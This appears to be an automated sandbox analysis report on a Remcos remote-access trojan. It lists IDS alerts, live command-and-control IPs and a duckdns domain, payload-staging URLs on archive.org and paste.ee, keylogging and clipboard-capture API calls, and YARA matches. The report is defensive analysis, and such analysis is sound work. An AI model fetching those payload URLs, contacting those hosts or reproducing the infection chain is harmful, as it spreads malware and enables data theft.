                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,7_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,7_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00407877 FindFirstFileW,FindNextFileW,7_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0044E8F9 FindFirstFileExA,7_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00407CD2

                    Software Vulnerabilities

                    barindex
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61743 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61748 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61754 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61752 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61751 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61755 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61757 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61758 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61753 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61766 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61756 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61769 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61763 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61761 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61771 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61772 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61762 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61759 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61775 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61778 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61764 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61783 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61777 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61776 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61786 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61779 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61792 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61770 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61785 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61780 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61773 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61784 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61791 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61760 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61774 -> 191.93.114.27:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61782 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61793 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61790 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61781 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61794 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61788 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61789 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:61787 -> 181.236.206.3:3000
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.7:49704 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.97.3:443 -> 192.168.2.7:49704
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 188.114.97.3:443 -> 192.168.2.7:49704
                    Source: Malware configuration extractorURLs: 23spt.duckdns.org
                    Source: unknownDNS query: name: paste.ee
                    Source: unknownDNS query: name: 23spt.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.7:61743 -> 191.93.114.27:3000
                    Source: global trafficTCP traffic: 192.168.2.7:61775 -> 181.236.206.3:3000
                    Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/tbzjY/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: ColombiaMovilCO ColombiaMovilCO
                    Source: Joe Sandbox ViewASN Name: TELEBUCARAMANGASAESPCO TELEBUCARAMANGASAESPCO
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 191.93.114.27
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00404B96 WaitForSingleObject,SetEvent,recv,7_2_00404B96
                    Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/tbzjY/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
                    Source: global trafficDNS traffic detected: DNS query: paste.ee
                    Source: global trafficDNS traffic detected: DNS query: 23spt.duckdns.org
                    Source: AddInProcess32.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9F0E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9F49C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9DC32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.1491722571.00000231A01FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1422565655.0000019C9DA11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9F131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9DC32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000002.00000002.1491722571.00000231A01B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000002.00000002.1491722571.00000231A01CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1422565655.0000019C9DA11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9DC32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9EA39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9EA39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arXr
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9EA39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1422565655.0000019C9DC32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9DC32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9F49C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9F131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9F131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9DE35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9DE35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/tbzjY/0
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.7:49703 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000007_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,7_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,7_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,7_2_0040A41B
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 5344, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2589118650.000000000288F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 5344, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041CA73 SystemParametersInfoW,7_2_0041CA73

                    System Summary

                    barindex
                    Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.powershell.exe.19caef2a460.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.powershell.exe.19caef2a460.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 968, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: AddInProcess32.exe PID: 5344, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
